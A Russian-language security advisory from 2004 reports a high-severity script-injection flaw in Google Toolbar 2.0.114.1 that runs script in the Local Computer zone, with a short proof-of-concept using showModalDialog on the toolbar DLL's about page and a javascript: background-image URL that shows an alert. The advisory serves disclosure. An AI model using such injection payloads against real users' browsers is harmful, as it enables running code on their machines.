Удаленное выполнение произвольного кода в Google Toolbar

Дата публикации:
19.09.2004
Всего просмотров:
820
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Google Toolbar 2.0.114.1-big/en (GGLD)

Описание: Уязвимость обнаружена в Google Toolbar. Удаленный пользователь может выполнить произвольный код сценария в зоне безопасности Local Computer.

Пример:

<script>
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</script>

URL производителя: http://toolbar.google.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: GoogleToolbar:About -- Allows Script Injection

или введите имя

CAPTCHA